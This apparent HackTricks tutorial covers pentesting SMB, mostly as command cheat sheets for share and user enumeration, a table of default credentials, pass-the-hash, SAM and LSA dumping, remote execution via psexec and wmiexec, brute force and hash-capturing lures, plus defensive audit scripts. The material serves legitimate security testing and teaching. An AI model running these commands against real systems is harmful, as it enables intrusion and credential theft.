# 139,445 - Pentesting SMB
{{#include ../../banners/hacktricks-training.md}}
## Port 139

The **Network Basic Input Output System (NetBIOS)** is a software protocol designed to enable applications, PCs, and desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**.

```bash
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```

## Port 445

Technically, Port 139 is referred to as ‘NBT over IP’, while Port 445 is identified as ‘SMB over IP’. The acronym **SMB** stands for ‘**Server Message Blocks**’, which is also modernly known as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is primarily used to enable shared access to files, printers and serial ports, and to facilitate various forms of communication between nodes on a network.

For instance, in the context of Windows, SMB can operate directly over TCP/IP, eliminating the need for NetBIOS over TCP/IP, through the use of port 445. Conversely, on other systems, the use of port 139 is observed, indicating that SMB is running in conjunction with NetBIOS over TCP/IP.

```bash
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
## SMB

The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed for regulating **access to files**, directories, and other network resources like printers and routers. Primarily used within the **Windows** operating system family, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the **Samba** project offers a free software solution, enabling SMB's implementation on **Linux** and Unix systems, thereby facilitating cross-platform communication through SMB.

Shares, representing **arbitrary parts of the local file system**, can be provided by an SMB server, making the directory hierarchy visible to a client partly **independent** from the server's actual structure. The **Access Control Lists (ACLs)**, which define **access rights**, allow for **fine-grained control** over user permissions, including attributes like **`execute`**, **`read`**, and **`full access`**. These permissions can be assigned to individual users or groups, per share, and are distinct from the local permissions set on the server.
### IPC$ Share

Access to the IPC$ share can be obtained through an anonymous null session, allowing interaction with the services exposed via named pipes. The utility `enum4linux` is useful for this purpose. Used properly, it enables the acquisition of:

- Information about the operating system
- Details about the parent domain
- A compilation of local users and groups
- Information about available SMB shares
- The effective system security policy

This functionality is critical for network administrators and security professionals to assess the security posture of SMB services on a network. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured.

```bash
enum4linux -a target_ip
```

The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`.
## What is NTLM

If you don't know what NTLM is, or you want to understand how it works and how it can be abused, this page about **NTLM** explains **how the protocol works and how you can take advantage of it**:
{{#ref}} ../../windows-hardening/ntlm/ {{#endref}}
## **Server Enumeration**

Scan a network searching for hosts:

```bash
nbtscan -r 192.168.0.1/24
```
### SMB server version

To look for possible exploits for the SMB version it is important to know which version is being used. If this information does not appear in the other tools you use, you can:

- Use the **MSF** auxiliary module **auxiliary/scanner/smb/smb_version**
- Or this script:

```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# The capture interface is hard-coded to tap0; change it to match your setup.
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
# Sniff the server's replies to a null login in the background and extract the "Unix Samba x.y.z" banner
tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
# Trigger the null login whose replies tcpdump is waiting for
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Search exploit**

```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Possible** **Credentials**

| **Username(s)** | **Common passwords** |
| --------------- | -------------------- |
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |

### Brute Force
### SMB Environment Information

### Obtain Information

```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Enumerate Users, Groups & Logged On Users

This information should already have been gathered by enum4linux and enum4linux-ng.

```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```

### Enumerate local users

```bash
lookupsid.py -no-pass hostname.local
```

### Oneliner

```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```

### Metasploit - Enumerate local users

```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Enumerating LSARPC and SAMR rpcclient**
{{#ref}} rpcclient-enumeration.md {{#endref}}
### GUI connection from linux

In the terminal:

```bash
xdg-open smb://cascade.htb/
```

In the file browser window (nautilus, thunar, etc.):

```bash
smb://friendzone.htb/general/
```
## Shared Folders Enumeration

### List shared folders

It is always recommended to check whether you can access anything; if you don't have credentials try using **null credentials/guest user**.

```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```

### **Connect/List a shared folder**

```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Manually enumerate windows shares and connect to them**

It may be that you are restricted from listing any shares of the host machine, so when you try to list them it looks as if there are no shares to connect to. It might therefore be worth trying to connect to a share manually. To enumerate shares manually, look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME while using a valid session (e.g. a null session or valid credentials). These indicate whether the share exists but you have no access to it, or whether the share does not exist at all.

Common share names for windows targets are

- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON

(Common share names from Network Security Assessment 3rd edition)

You can try to connect to them with the following command

```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```

or this script (using a null session)

```bash
#!/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in "${shares[@]}"; do
    # capture stderr as well, since smbclient reports NT_STATUS errors there
    output=$(smbclient -U '%' -N "\\\\${ip}\\${share}" -c '' 2>&1)

    if [[ -z $output ]]; then
        echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
    else
        echo "$output" # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```

examples

```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Enumerate shares from Windows / without third party tools**

PowerShell

```powershell
# Retrieves the SMB shares on the local computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```

CMD console

```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```

MMC Snap-in (graphical)

```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```

explorer.exe (graphical), enter `\\<ip>\` to see the available non-hidden shares.
### Mount a shared folder

```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```

### **Download files**

Read the previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```

```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```

Commands:

- mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
- recurse: toggles recursion on (default: off)
- prompt: toggles prompting for filenames off (default: on)
- mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)
### Domain Shared Folders Search

- Snaffler

```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

- CrackMapExec spider.

```bash
-M spider_plus [--share <share_name>]
--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```

Especially interesting from shares are the files called **`Registry.xml`**, as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files, as they contain credentials.

> [!TIP]
> The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.
> You should **check** the **scripts** inside it, as you might **find** sensitive info such as **passwords**.
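The SYSVOL audit described above, as an added example (this is not HackTricks' or Impacket's code): it walks a directory tree such as a mounted copy of SYSVOL, looks for `Registry.xml` and `web.config`, and reports entries that carry a plaintext password. The sample files are constructed here in a temporary directory so the script runs offline; their layout follows the Group Policy Preferences `RegistrySettings/Registry/Properties` structure and the ASP.NET `connectionStrings/add` structure, and the `{GUID}` path component is a placeholder for a real policy folder name.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample: a GPP Registry.xml that pushes Winlogon autologon values
SAMPLE_REGISTRY_XML = """<?xml version="1.0" encoding="utf-8"?>
<RegistrySettings>
  <Registry name="DefaultUserName" status="DefaultUserName">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE" key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" name="DefaultUserName" type="REG_SZ" value="svc_autologon"/>
  </Registry>
  <Registry name="DefaultPassword" status="DefaultPassword">
    <Properties action="U" hive="HKEY_LOCAL_MACHINE" key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" name="DefaultPassword" type="REG_SZ" value="Example-Pass-123"/>
  </Registry>
</RegistrySettings>
"""

# Constructed sample: a web.config with an inline database password
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=db01;Database=app;User Id=app_user;Password=Example-Db-Pass;" providerName="System.Data.SqlClient"/>
  </connectionStrings>
</configuration>
"""

# Registry value names that hold a secret when set through GPP (assumed list for this example)
SENSITIVE_REG_VALUES = {"defaultpassword", "altdefaultpassword"}
PASSWORD_RE = re.compile(r"(?:password|pwd)\s*=\s*([^;\"']+)", re.IGNORECASE)


def scan_registry_xml(path: str) -> List[Dict[str, str]]:
    """Report <Properties> entries whose value name is a known secret holder."""
    hits = []
    for props in ET.parse(path).getroot().iter("Properties"):
        name = props.get("name", "")
        if name.lower() in SENSITIVE_REG_VALUES:
            hits.append({"file": path, "kind": "gpp-registry",
                         "where": f"{props.get('hive', '')}\\{props.get('key', '')}\\{name}",
                         "value": props.get("value", "")})
    return hits


def scan_web_config(path: str) -> List[Dict[str, str]]:
    """Report connection strings that embed a password."""
    hits = []
    for add in ET.parse(path).getroot().iter("add"):
        cs = add.get("connectionString")
        m = PASSWORD_RE.search(cs) if cs else None
        if m:
            hits.append({"file": path, "kind": "web-config",
                         "where": add.get("name", ""), "value": m.group(1)})
    return hits


def scan_tree(root_dir: str) -> List[Dict[str, str]]:
    """Walk a directory (e.g. a mounted SYSVOL copy) and scan the interesting file names."""
    hits = []
    for dirpath, _, filenames in os.walk(root_dir):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                if fn.lower() == "registry.xml":
                    hits.extend(scan_registry_xml(full))
                elif fn.lower() == "web.config":
                    hits.extend(scan_web_config(full))
            except ET.ParseError:
                continue  # malformed XML: skip it instead of aborting the whole scan
    return hits


def build_sample_tree() -> str:
    """Write the constructed sample files into a temp dir laid out like SYSVOL; returns its path."""
    base = tempfile.mkdtemp(prefix="sysvol_sample_")
    gpp = os.path.join(base, "Policies", "{GUID}", "Machine", "Preferences", "Registry")
    os.makedirs(gpp)
    with open(os.path.join(gpp, "Registry.xml"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_REGISTRY_XML)
    web = os.path.join(base, "scripts", "app")
    os.makedirs(web)
    with open(os.path.join(web, "web.config"), "w", encoding="utf-8") as f:
        f.write(SAMPLE_WEB_CONFIG)
    return base


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print(f"{hit['kind']:12} {hit['file']}\n    {hit['where']} -> {hit['value']}")
```

Point `scan_tree` at a directory where SYSVOL is mounted (see the `mount -t cifs` section) to run it against a real copy; the value names in `SENSITIVE_REG_VALUES` and the password regex are the two places to extend when your environment stores secrets under other names.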
### Read Registry

You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try:

```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Post Exploitation

The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and may contain some **dangerous configs**:

| **Setting** | **Description** |
| ----------- | --------------- |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `enable privileges = yes` | Honor privileges assigned to a specific SID? |
| `create mask = 0777` | What permissions must be assigned to newly created files? |
| `directory mask = 0777` | What permissions must be assigned to newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script needs to be executed when the script gets closed? |
| `magic output = script.out` | Where does the output of the magic script need to be stored? |

The command `smbstatus` gives information about the **server** and about **who is connected**.
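A configuration check for the table above, as an added example (not HackTricks' or the Samba project's code): it parses an `smb.conf`, normalises parameter names the way Samba does (whitespace removed, case-insensitive, so `read only` and `readonly` compare equal), resolves the `writable`/`writeable`/`write ok` and `public` synonyms, and reports the risky settings per section. The sample configuration and the severity labels are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample smb.conf, not taken from any real server
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   enable privileges = yes
   logon script = logon.bat

[public]
   path = /srv/public
   browseable = yes
   guest ok = yes
   writable = yes
   create mask = 0777
   directory mask = 0777

[secure]
   path = /srv/secure
   read only = yes
   guest ok = no
   magic script = cleanup.sh
   magic output = cleanup.out
"""


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf reader: [section] headers and 'key = value' lines; # and ; start comments."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def _is_yes(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def _is_no(value: str) -> bool:
    return value.strip().lower() in ("no", "false", "0")


def audit_section(name: str, params: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for one share, or for [global]."""
    findings: List[Tuple[str, str]] = []
    # 'writable', 'writeable' and 'write ok' are Samba synonyms for 'read only = no'
    writable = _is_no(params.get("readonly", "yes")) or any(
        _is_yes(params.get(k, "no")) for k in ("writable", "writeable", "writeok"))
    # 'public' is a synonym for 'guest ok'
    guest = any(_is_yes(params.get(k, "no")) for k in ("guestok", "public"))
    if name == "global":
        if _is_yes(params.get("enableprivileges", "no")):
            findings.append(("medium", "enable privileges = yes: privileges granted to SIDs are honoured"))
    else:
        if guest and writable:
            findings.append(("high", "guest-accessible AND writable share"))
        elif guest:
            findings.append(("medium", "guest ok = yes: no password needed to connect"))
        elif writable:
            findings.append(("low", "writable share"))
        if _is_yes(params.get("browseable", "yes")):  # Samba's default is yes
            findings.append(("info", "browseable: share is listed to clients"))
    for mask in ("createmask", "directorymask"):
        if params.get(mask, "") == "0777":
            findings.append(("medium", f"{mask} = 0777: new entries are world-writable"))
    for hook in ("logonscript", "magicscript", "magicoutput"):
        if hook in params:
            findings.append(("medium", f"{hook} = {params[hook]}: script hook configured"))
    return findings


def audit_smb_conf(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Audit every section; returns {section: findings} for sections that have any."""
    result: Dict[str, List[Tuple[str, str]]] = {}
    for name, params in parse_smb_conf(text).items():
        found = audit_section(name, params)
        if found:
            result[name] = found
    return result


if __name__ == "__main__":
    for section, findings in audit_smb_conf(SAMPLE_SMB_CONF).items():
        for severity, message in findings:
            print(f"[{severity:>6}] [{section}] {message}")
```

Feed it the contents of `/etc/samba/smb.conf` (the parser ignores `include =` directives, so audit included files separately). The combination check matters more than any single row of the table: a share that is both `guest ok` and writable is the one to fix first.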
### Authenticate using kerberos

You can **authenticate to kerberos** using the tools **smbclient** and **rpcclient**:

```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```

In Kerberos-only environments (NTLM disabled), NTLM attempts against SMB may return `STATUS_NOT_SUPPORTED`. Fix the common Kerberos issues and force Kerberos authentication:

```bash
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
```

For a full client setup (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) see:
{{#ref}} ../pentesting-kerberos-88/README.md {{#endref}}
## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec**, with **wmiexec** being the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### psexec/smbexec

Both options will **create a new service** (using `\pipe\svcctl` via SMB) on the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to the ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put the payload in the arguments --**file-less technique**--).

**More info** about psexec and smbexec.

In kali it is located on /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```

Using the **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**
### wmiexec/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**

In kali it is located on /usr/share/doc/python3-impacket/examples/

```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you don't do that a semi-interactive shell will be prompted
```

Using the **parameter** `-k` you can authenticate against **kerberos** instead of **NTLM**

```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you don't do that a semi-interactive shell will be prompted
```
### AtExec

Execute commands via the Task Scheduler (using `\pipe\atsvc` via SMB).

In kali it is located on /usr/share/doc/python3-impacket/examples/

```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```

## Impacket reference

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

## ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
{{#ref}} ksmbd-attack-surface-and-fuzzing-syzkaller.md {{#endref}}
## **Bruteforce users credentials**

**This is not recommended, you could block an account if you exceed the maximum allowed tries**

```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.

More information about this attack here.

## SMB-Trap

The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)

SMBTrap using MitMf

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an SMB relay attack.
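A detection for the lure described in the SMB-Trap and NTLM Theft sections above, as an added example (not HackTricks' code): it finds the references that make a Windows client attempt SMB authentication when a page is rendered or a file is opened, namely UNC paths (two backslashes, host, share) and `file://host/share` URLs, and flags those whose host is not on an allow-list of known intranet servers. The HTML page, the batch script and the `TRUSTED_HOSTS` allow-list are constructed for the example.

```python
import re
from typing import Dict, List, Set

# A UNC path: two backslashes, a host, a backslash, then the share name.
# The lookbehind keeps a run of three or more backslashes from being read as a UNC.
UNC_RE = re.compile(r"""(?<![\w\\])\\\\([A-Za-z0-9._-]+)\\([^\\\s"'<>]+)""")
# file://host/share or file:\\host\share; file:///C:/... has no host and is not matched.
FILE_URL_RE = re.compile(r"""file:(?://|\\\\)([A-Za-z0-9._-]+)[/\\]([^/\\\s"'<>]+)""", re.IGNORECASE)

# Constructed sample page: one image tag points at an SMB host (the SMB-Trap case)
SAMPLE_HTML = r'''<html><body>
<img src="\\10.10.10.10\path\image.jpg">
<a href="file://fileserver.corp.local/public/report.pdf">report</a>
<img src="https://cdn.example.com/logo.png">
</body></html>'''

# Constructed sample file as it might be found on a share (the NTLM Theft case)
SAMPLE_SCRIPT = r'''@echo off
net use Z: \\fileserver.corp.local\data
start \\203.0.113.5\docs\readme.txt
'''

# Assumed allow-list of your own file servers; replace with the real intranet hosts
TRUSTED_HOSTS: Set[str] = {"fileserver.corp.local"}


def find_smb_references(text: str) -> List[Dict[str, str]]:
    """Return every UNC / file URL reference with its host and first path component."""
    refs: List[Dict[str, str]] = []
    for m in UNC_RE.finditer(text):
        refs.append({"form": "unc", "host": m.group(1), "share": m.group(2), "raw": m.group(0)})
    for m in FILE_URL_RE.finditer(text):
        refs.append({"form": "file-url", "host": m.group(1), "share": m.group(2), "raw": m.group(0)})
    return refs


def flag_untrusted(text: str, trusted_hosts: Set[str]) -> List[Dict[str, str]]:
    """Keep only references whose host is not on the allow-list (case-insensitive).

    Each one is a place where a client could be made to send an outbound
    NTLM authentication to a host you do not control, so it is worth alerting on.
    """
    trusted = {h.lower() for h in trusted_hosts}
    return [r for r in find_smb_references(text) if r["host"].lower() not in trusted]


if __name__ == "__main__":
    for label, sample in (("html", SAMPLE_HTML), ("script", SAMPLE_SCRIPT)):
        for ref in flag_untrusted(sample, TRUSTED_HOSTS):
            print(f"[{label}] untrusted {ref['form']} reference to {ref['host']}: {ref['raw']}")
```

Run `flag_untrusted` over proxied HTML responses or over text files pulled from a share review; an IP literal or an unknown host in the `host` field is the signal, and the `raw` field tells you where in the content it sits. At the network edge, the same class of event shows up as outbound TCP 445 to hosts outside the allow-list, which is the complementary control.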
## HackTricks Automatic Commands

```yaml
Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number: 137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block    #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SMB
  Note: |
    While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

    #These are the commands I run in order every time I see an open SMB port

    With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbmap -H {IP} -u guest
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    crackmapexec smb {IP} --pass-pol -u "guest" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

    With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
    smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html

Entry_2:
